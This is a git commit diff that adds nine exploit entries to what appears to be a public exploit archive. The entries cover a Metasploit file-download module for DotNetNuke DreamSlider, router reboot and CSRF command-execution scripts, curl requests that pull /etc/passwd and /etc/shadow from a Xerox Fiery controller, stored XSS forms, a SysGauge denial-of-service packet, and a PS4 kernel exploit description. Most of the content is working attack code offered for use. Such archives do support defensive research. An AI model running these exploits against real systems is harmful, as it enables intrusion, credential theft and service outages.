DB: 2017-12-28
9 changes to exploits/shellcodes Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service SysGauge Server 3.6.18 - Denial of Service ALLMediaServer 0.95 - Buffer Overflow Sony Playstation 4 4.05 FW - Local Kernel Loader Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure Easy!Appointments 1.2.1 - Cross-Site Scripting Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
This commit is contained in:
parent
b91055c9da
commit
267f841bd8
10 changed files with 681 additions and 0 deletions
131
exploits/aspx/webapps/43405.rb
Executable file
131
exploits/aspx/webapps/43405.rb
Executable file
|
@ -0,0 +1,131 @@
|
||||||
|
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
|
||||||
|
# Date: 23/01/2014
|
||||||
|
# Author: Glafkos Charalambous
|
||||||
|
# Version: 01.01.02
|
||||||
|
# Vendor: DreamSlider
|
||||||
|
# Vendor URL: http://www.dreamslider.com/
|
||||||
|
# Google Dork: inurl:/DesktopModules/DreamSlider/
|
||||||
|
# CVE:
|
||||||
|
#
|
||||||
|
# Description
|
||||||
|
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
|
||||||
|
#
|
||||||
|
# Vulnerable Code
|
||||||
|
#
|
||||||
|
# namespace DotNetNuke.Modules.DreamSlider
|
||||||
|
# {
|
||||||
|
# using System;
|
||||||
|
# using System.IO;
|
||||||
|
# using System.Web.SessionState;
|
||||||
|
# using System.Web.UI;
|
||||||
|
#
|
||||||
|
# public class DownloadProvider : Page, IRequiresSessionState
|
||||||
|
# {
|
||||||
|
# protected void Page_Load(object sender, EventArgs e)
|
||||||
|
# {
|
||||||
|
# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
|
||||||
|
# {
|
||||||
|
# string path = base.Request.QueryString["File"];
|
||||||
|
# string fileName = Path.GetFileName(path);
|
||||||
|
# base.Response.ContentType = "application/octet-stream";
|
||||||
|
# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
|
||||||
|
# base.Response.WriteFile(path);
|
||||||
|
# base.Response.End();
|
||||||
|
# }
|
||||||
|
# }
|
||||||
|
# }
|
||||||
|
# }
|
||||||
|
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits an unauthenticated arbitrary file download vulnerability in DNN
|
||||||
|
DreamSlider version 01.01.02 and below.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Glafkos Charalambous', # Discovery and Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'http://metasploit.com' ]
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Mar 23 2015'))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80),
|
||||||
|
OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
|
||||||
|
OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
begin
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
|
||||||
|
'cookie' => datastore['Cookie'],
|
||||||
|
})
|
||||||
|
|
||||||
|
if res && res.code == 200 and res.body.to_s =~ /Download Provider/
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
begin
|
||||||
|
print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
|
||||||
|
'cookie' => datastore['Cookie'],
|
||||||
|
})
|
||||||
|
|
||||||
|
rescue Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Could not connect.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if res && res.code == 200
|
||||||
|
if res.body.to_s.bytesize == 0
|
||||||
|
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
fileName = datastore['FILENAME']
|
||||||
|
|
||||||
|
path = store_loot(
|
||||||
|
'ds.http',
|
||||||
|
'application/octet-stream',
|
||||||
|
datastore['RHOST'],
|
||||||
|
res.body,
|
||||||
|
fileName
|
||||||
|
)
|
||||||
|
print_good("#{peer} - File saved in: #{path}")
|
||||||
|
else
|
||||||
|
print_error("#{peer} - Failed to download file.")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
32
exploits/bsd/local/43397.md
Normal file
32
exploits/bsd/local/43397.md
Normal file
|
@ -0,0 +1,32 @@
|
||||||
|
# PS4 4.05 Kernel Exploit
|
||||||
|
---
|
||||||
|
## Summary
|
||||||
|
In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
|
||||||
|
|
||||||
|
You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
|
||||||
|
|
||||||
|
## Patches Included
|
||||||
|
The following patches are made by default in the kernel ROP chain:
|
||||||
|
1) Disable kernel write protection
|
||||||
|
2) Allow RWX (read-write-execute) memory mapping
|
||||||
|
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
|
||||||
|
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
|
||||||
|
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
|
||||||
|
|
||||||
|
## Notes
|
||||||
|
- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
|
||||||
|
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
|
||||||
|
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
|
||||||
|
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
|
||||||
|
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
|
||||||
|
|
||||||
|
## Contributors
|
||||||
|
I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
|
||||||
|
|
||||||
|
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
|
||||||
|
- [Flatz](https://twitter.com/flat_z)
|
||||||
|
- [CTurt](https://twitter.com/CTurtE)
|
||||||
|
- Anonymous
|
||||||
|
|
||||||
|
|
||||||
|
E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip
|
62
exploits/hardware/dos/43401.py
Executable file
62
exploits/hardware/dos/43401.py
Executable file
|
@ -0,0 +1,62 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Telesquare Co., Ltd.
|
||||||
|
# Product web page: http://www.telesquare.co.kr
|
||||||
|
# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
|
||||||
|
# LteVer: ML300S5XEA41_090 1 0.1.0
|
||||||
|
# Modem model: PM-L300S
|
||||||
|
#
|
||||||
|
# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
|
||||||
|
# LTE wireless communication based LTE router product.
|
||||||
|
#
|
||||||
|
# Desc: The router suffers from an unauthenticated reboot command execution.
|
||||||
|
# Attackers can exploit this issue to cause a denial of service scenario.
|
||||||
|
#
|
||||||
|
# --------------------------------------------------------------------
|
||||||
|
# /lte/lteuicc.shtml:
|
||||||
|
# -------------------
|
||||||
|
#
|
||||||
|
# 858: function RebootRequest()
|
||||||
|
# 859: {
|
||||||
|
# 860: var url = "../cgi-bin/lte.cgi?";
|
||||||
|
# 861: var param = "Command=Reboot";
|
||||||
|
# 862: XHRPost(RebootHandle, url, param, false ); //sync call
|
||||||
|
# 863: }
|
||||||
|
#
|
||||||
|
# --------------------------------------------------------------------
|
||||||
|
#
|
||||||
|
# Tested on: lighttpd/1.4.20
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5444
|
||||||
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 22.12.2017
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys, requests
|
||||||
|
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
|
||||||
|
print 'Usage: b00t.py <ip> <port>\n'
|
||||||
|
quit()
|
||||||
|
|
||||||
|
ip = sys.argv[1]
|
||||||
|
port = sys.argv[2]
|
||||||
|
|
||||||
|
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
|
||||||
|
|
||||||
|
# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
|
||||||
|
#print r.content #if in r.content: <xml></xml>, reboot true.
|
||||||
|
|
||||||
|
print "Router rebooted."
|
55
exploits/hardware/webapps/43400.html
Normal file
55
exploits/hardware/webapps/43400.html
Normal file
|
@ -0,0 +1,55 @@
|
||||||
|
Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Telesquare Co., Ltd.
|
||||||
|
Product web page: http://www.telesquare.co.kr
|
||||||
|
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
|
||||||
|
LteVer: ML300S5XEA41_090 1 0.1.0
|
||||||
|
Modem model: PM-L300S
|
||||||
|
|
||||||
|
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
|
||||||
|
LTE wireless communication based LTE router product.
|
||||||
|
|
||||||
|
Desc: The router suffers from authenticated arbitrary system command
|
||||||
|
execution. The application interface allows users to perform certain
|
||||||
|
actions via HTTP requests without performing any validity checks to
|
||||||
|
verify the requests. This can be exploited to perform certain actions
|
||||||
|
with administrative privileges if a logged-in user visits a malicious
|
||||||
|
web site.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.20
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5443
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php
|
||||||
|
|
||||||
|
|
||||||
|
22.12.2017
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
IDOR for system command interface:
|
||||||
|
----------------------------------
|
||||||
|
|
||||||
|
GET /admin/system_command.shtml HTTP/1.1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
PoC GET CSRF request:
|
||||||
|
---------------------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://10.0.0.17:8081/cgi-bin/admin.cgi">
|
||||||
|
<input type="hidden" name="Command" value="sysCommand" />
|
||||||
|
<input type="hidden" name="Cmd" value="uname%20-a" />
|
||||||
|
<input type="hidden" name="T" value="8168008531337" />
|
||||||
|
<input type="submit" value="Send" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
53
exploits/hardware/webapps/43402.txt
Normal file
53
exploits/hardware/webapps/43402.txt
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Telesquare Co., Ltd.
|
||||||
|
Product web page: http://www.telesquare.co.kr
|
||||||
|
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
|
||||||
|
LteVer: ML300S5XEA41_090 1 0.1.0
|
||||||
|
Modem model: PM-L300S
|
||||||
|
|
||||||
|
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
|
||||||
|
LTE wireless communication based LTE router product.
|
||||||
|
|
||||||
|
Desc: Insecure direct object references occur when an application
|
||||||
|
provides direct access to objects based on user-supplied input. As
|
||||||
|
a result of this vulnerability attackers can bypass authorization
|
||||||
|
and access resources and functionalities in the system.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.20
|
||||||
|
Linux mips
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5445
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php
|
||||||
|
|
||||||
|
|
||||||
|
22.12.2017
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/home.html << Version and status info leak (firmware, device, type, modem, lte)
|
||||||
|
/index.html << Version and status info leak (firmware, device, type, modem, lte)
|
||||||
|
/nas/smbsrv.shtml << Samba server settings (workgroup, netbios name)
|
||||||
|
/nas/ftpsrv.shtml << FTP settings
|
||||||
|
/wifi2g/basic.shtml << Wireless settings
|
||||||
|
/admin/status.shtml << Access point status info leak
|
||||||
|
/internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
|
||||||
|
/internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
|
||||||
|
/admin/statistic.shtml << System statistics info leak
|
||||||
|
/admin/management.shtml << System management (account settings, ntp settings, ddns settings)
|
||||||
|
/serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port)
|
||||||
|
/admin/system_command.shtml << System command interface
|
||||||
|
/internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr)
|
||||||
|
/admin/upload_firmware.shtml << Router firmware and lte firmware upgrade
|
||||||
|
/firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check)
|
||||||
|
/cgi-bin/lte.cgi?Command=getUiccState << GetUiccState()
|
||||||
|
/cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak
|
||||||
|
/cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak
|
142
exploits/php/webapps/43398.txt
Normal file
142
exploits/php/webapps/43398.txt
Normal file
|
@ -0,0 +1,142 @@
|
||||||
|
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Electronics for Imaging, Inc.
|
||||||
|
Product web page: http://www.efi.com
|
||||||
|
Affected version: EFI Fiery Controller SW2.0
|
||||||
|
Xerox DocuColor 260, 250, 242
|
||||||
|
|
||||||
|
Summary: Drive production profitability with Fiery servers and workflow
|
||||||
|
products. See which Fiery digital front end is right for your current
|
||||||
|
or future print engines and business needs. Manage all your printers
|
||||||
|
from a single screen using this intuitive print job management interface.
|
||||||
|
|
||||||
|
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
|
||||||
|
script is not properly sanitized before being used to read files. This
|
||||||
|
can be exploited by an unauthenticated attacker to read arbitrary files
|
||||||
|
on the affected system.
|
||||||
|
|
||||||
|
======================================================================
|
||||||
|
/wt3/js/save.js:
|
||||||
|
----------------
|
||||||
|
|
||||||
|
103: function parseSaveMessages() {
|
||||||
|
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
|
||||||
|
105: var url = urlNode.firstChild.data;
|
||||||
|
106: var forcedSaveUrl = "forceSave.php?file=" + url;
|
||||||
|
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
|
||||||
|
|
||||||
|
====
|
||||||
|
|
||||||
|
/wt3/forceSave.php:
|
||||||
|
-------------------
|
||||||
|
1. <?php
|
||||||
|
2. //code posted by chrisputnam at gmail dot com
|
||||||
|
3. function readfile_chunked($filename,$retbytes=true)
|
||||||
|
4. {
|
||||||
|
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
|
||||||
|
6. $buffer = '';
|
||||||
|
7. $cnt =0;
|
||||||
|
8. // $handle = fopen($filename, 'rb');
|
||||||
|
9. $handle = fopen($filename, 'rb');
|
||||||
|
10. if ($handle === false)
|
||||||
|
11. {
|
||||||
|
12. return false;
|
||||||
|
13. }
|
||||||
|
14. while (!feof($handle))
|
||||||
|
15. {
|
||||||
|
16. //read a chunk
|
||||||
|
17. $buffer = fread($handle, $chunksize);
|
||||||
|
18. //send the chunk
|
||||||
|
19. echo $buffer;
|
||||||
|
20. //flush the chunk
|
||||||
|
21. flush();
|
||||||
|
22. //increment the size read/sent
|
||||||
|
23. if ($retbytes)
|
||||||
|
24. {
|
||||||
|
25. $cnt += strlen($buffer);
|
||||||
|
26. }
|
||||||
|
27. }
|
||||||
|
28. //close file
|
||||||
|
29. $status = fclose($handle);
|
||||||
|
30. if ($retbytes && $status)
|
||||||
|
31. {
|
||||||
|
32. return $cnt; // return num. bytes delivered like readfile() does.
|
||||||
|
33. }
|
||||||
|
34. return $status;
|
||||||
|
35. }
|
||||||
|
36.
|
||||||
|
37. $filename = $_GET['file'];
|
||||||
|
38. if(!$filename)
|
||||||
|
39. {
|
||||||
|
40. echo "ERROR: No filename specified. Please try again.";
|
||||||
|
41. }
|
||||||
|
42. else
|
||||||
|
43. {
|
||||||
|
44. // fix for IE caching or PHP bug issue
|
||||||
|
45. header("Pragma: public");
|
||||||
|
46. header("Expires: 0"); // set expiration time
|
||||||
|
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
|
||||||
|
48. // browser must download file from server instead of cache
|
||||||
|
49.
|
||||||
|
50. // force download dialog
|
||||||
|
51. header("Content-Type: application/force-download");
|
||||||
|
52. header("Content-Type: application/octet-stream");
|
||||||
|
53. header("Content-Type: application/download");
|
||||||
|
54.
|
||||||
|
55. // use the Content-Disposition header to supply a recommended filename and
|
||||||
|
56. // force the browser to display the save dialog.
|
||||||
|
57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
|
||||||
|
58. header("Content-Transfer-Encoding: binary");
|
||||||
|
59.
|
||||||
|
60. header("Content-Length: " . filesize($filename));
|
||||||
|
61.
|
||||||
|
62. set_time_limit(0);
|
||||||
|
63. readfile_chunked($filename, false);
|
||||||
|
64.
|
||||||
|
65. exit();
|
||||||
|
66. }
|
||||||
|
67.
|
||||||
|
68. ?>
|
||||||
|
|
||||||
|
======================================================================
|
||||||
|
|
||||||
|
|
||||||
|
Tested on: Debian GNU/Linux 3.1
|
||||||
|
Apache
|
||||||
|
PHP/5.4.41
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5447
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
|
||||||
|
|
||||||
|
|
||||||
|
20.12.2017
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
|
||||||
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
||||||
|
bin:x:2:2:bin:/bin:/bin/sh
|
||||||
|
sys:x:3:3:sys:/dev:/bin/sh
|
||||||
|
sync:x:4:100:sync:/bin:/bin/sync
|
||||||
|
games:x:5:100:games:/usr/games:/bin/sh
|
||||||
|
...
|
||||||
|
...
|
||||||
|
|
||||||
|
|
||||||
|
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
|
||||||
|
root:LUUVeT6GbOy9I:10978:0:99999:7:::
|
||||||
|
daemon:*:10979:0:99999:7:::
|
||||||
|
bin:*:10979:0:99999:7:::
|
||||||
|
sys:*:10979:0:99999:7:::
|
||||||
|
sync:*:10979:0:99999:7:::
|
||||||
|
games:*:10979:0:99999:7:::
|
||||||
|
...
|
||||||
|
...
|
112
exploits/php/webapps/43399.txt
Normal file
112
exploits/php/webapps/43399.txt
Normal file
|
@ -0,0 +1,112 @@
|
||||||
|
Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Alex Tselegidis
|
||||||
|
Product web page: http://www.easyappointments.org
|
||||||
|
Affected version: 1.2.1
|
||||||
|
|
||||||
|
Summary: Easy!Appointments is a highly customizable web application
|
||||||
|
that allows your customers to book appointments with you via the web.
|
||||||
|
Moreover, it provides the ability to sync your data with Google Calendar
|
||||||
|
so you can use them with other services. It is an open source project
|
||||||
|
and you can download and install it even for commercial use. Easy!Appointments
|
||||||
|
will run smoothly with your existing website, because it can be installed
|
||||||
|
in a single folder of the server and of course, both sites can share
|
||||||
|
the same database. Learn more about the project in the Features page.
|
||||||
|
|
||||||
|
Desc: The application suffers from multiple stored and reflected XSS
|
||||||
|
vulnerabilities. The issues are triggered when an unauthorized input
|
||||||
|
passed via multiple POST and GET parameters is not properly sanitized
|
||||||
|
before being returned to the user. This can be exploited to execute
|
||||||
|
arbitrary HTML and script code in a user's browser session in context
|
||||||
|
of an affected site.
|
||||||
|
|
||||||
|
Tested on: Apache/2.4.23 (Win32)
|
||||||
|
OpenSSL/1.0.2h
|
||||||
|
MariaDB-10.1.19
|
||||||
|
PHP/5.6.28
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5442
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
|
||||||
|
|
||||||
|
|
||||||
|
20.10.2017
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
{"name":"XSS1","description":"Description"}
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://10.211.55.3/easyappointments121/index.php/backend_api/ajax_save_service_category" method="POST">
|
||||||
|
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
|
||||||
|
<input type="hidden" name="category" value="{"name":"XSS1","description":"Description"}" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
|
||||||
|
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
|
||||||
|
<input type="hidden" name="service_id" value='"><script>alert(2)</script>' />
|
||||||
|
<input type="hidden" name="provider_id" value="85" />
|
||||||
|
<input type="hidden" name="selected_date" value="2017-11-30" />
|
||||||
|
<input type="hidden" name="service_duration" value="30" />
|
||||||
|
<input type="hidden" name="manage_mode" value="false" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
|
||||||
|
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
|
||||||
|
<input type="hidden" name="service_id" value="13" />
|
||||||
|
<input type="hidden" name="provider_id" value="85" />
|
||||||
|
<input type="hidden" name="selected_date" value="<marquee>" />
|
||||||
|
<input type="hidden" name="service_duration" value="30" />
|
||||||
|
<input type="hidden" name="manage_mode" value="false" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_register_appointment" method="POST">
|
||||||
|
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
|
||||||
|
<input type="hidden" name="post_data[customer][last_name]" value="sdadsd" />
|
||||||
|
<input type="hidden" name="post_data[customer][first_name]" value="asdasd" />
|
||||||
|
<input type="hidden" name="post_data[customer][email]" value="asdasd@bbb.dd" />
|
||||||
|
<input type="hidden" name="post_data[customer][phone_number]" value="1112223333" />
|
||||||
|
<input type="hidden" name="post_data[customer][address]" value="" />
|
||||||
|
<input type="hidden" name="post_data[customer][city]" value="" />
|
||||||
|
<input type="hidden" name="post_data[customer][zip_code]" value="" />
|
||||||
|
<input type="hidden" name="post_data[appointment][start_datetime]" value=""><script>alert(3)</script>" />
|
||||||
|
<input type="hidden" name="post_data[appointment][end_datetime]" value="2017-11-30 16:00:00" />
|
||||||
|
<input type="hidden" name="post_data[appointment][notes]" value="" />
|
||||||
|
<input type="hidden" name="post_data[appointment][is_unavailable]" value="false" />
|
||||||
|
<input type="hidden" name="post_data[appointment][id_users_provider]" value="85" />
|
||||||
|
<input type="hidden" name="post_data[appointment][id_services]" value="13" />
|
||||||
|
<input type="hidden" name="post_data[manage_mode]" value="false" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
41
exploits/windows/dos/43403.py
Executable file
41
exploits/windows/dos/43403.py
Executable file
|
@ -0,0 +1,41 @@
|
||||||
|
# Exploit Title: SysGauge Server 3.6.18 - DOS
|
||||||
|
# Date: 2017-10-20
|
||||||
|
# Exploit Author: Ahmad Mahfouz
|
||||||
|
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
|
||||||
|
# Version: v3.6.18
|
||||||
|
# Category; Windows Remote DOS
|
||||||
|
# CVE: CVE-2017-15667
|
||||||
|
# Author Homepage: www.unixawy.com
|
||||||
|
# Description: SysGauge Server 3.6.18 the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
import socket
|
||||||
|
target = "192.168.72.133"
|
||||||
|
port = 9221
|
||||||
|
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
s.connect((target,port))
|
||||||
|
packet = "\x75\x19\xba\xab\x03"
|
||||||
|
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
|
||||||
|
packet += "\x00"
|
||||||
|
packet += "\x3e"
|
||||||
|
packet += "\x00"
|
||||||
|
packet += "\x20"
|
||||||
|
packet += "\x00"
|
||||||
|
packet += "\x00"
|
||||||
|
packet += "\x00"
|
||||||
|
packet += "\x00\x00\x00\x00"
|
||||||
|
packet += "SERVER_GET_INFO"
|
||||||
|
packet += "\x02\x32\x01"
|
||||||
|
packet += "Data"
|
||||||
|
packet += "\x01\x30\x01\x00"
|
||||||
|
packet += "\x04\x02\x74"
|
||||||
|
packet += "\x18\x18\x00"
|
||||||
|
s.send(packet)
|
||||||
|
|
||||||
|
try:
|
||||||
|
|
||||||
|
data = s.recv(100)
|
||||||
|
|
||||||
|
except:
|
||||||
|
|
||||||
|
print "K1LL3D"
|
44
exploits/windows/dos/43406.py
Executable file
44
exploits/windows/dos/43406.py
Executable file
|
@ -0,0 +1,44 @@
|
||||||
|
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
|
||||||
|
# CVE: CVE-2017-17932
|
||||||
|
# Date: 27-12-2017
|
||||||
|
# Exploit Author: Aloyce J. Makalanga
|
||||||
|
# Contact: https://twitter.com/aloycemjr
|
||||||
|
# Vendor Homepage: http://www.allmediaserver.org/
|
||||||
|
# Category: webapps
|
||||||
|
# Attack Type: Remote
|
||||||
|
# Impact: Code execution and/or Denial of Service
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1. Description
|
||||||
|
|
||||||
|
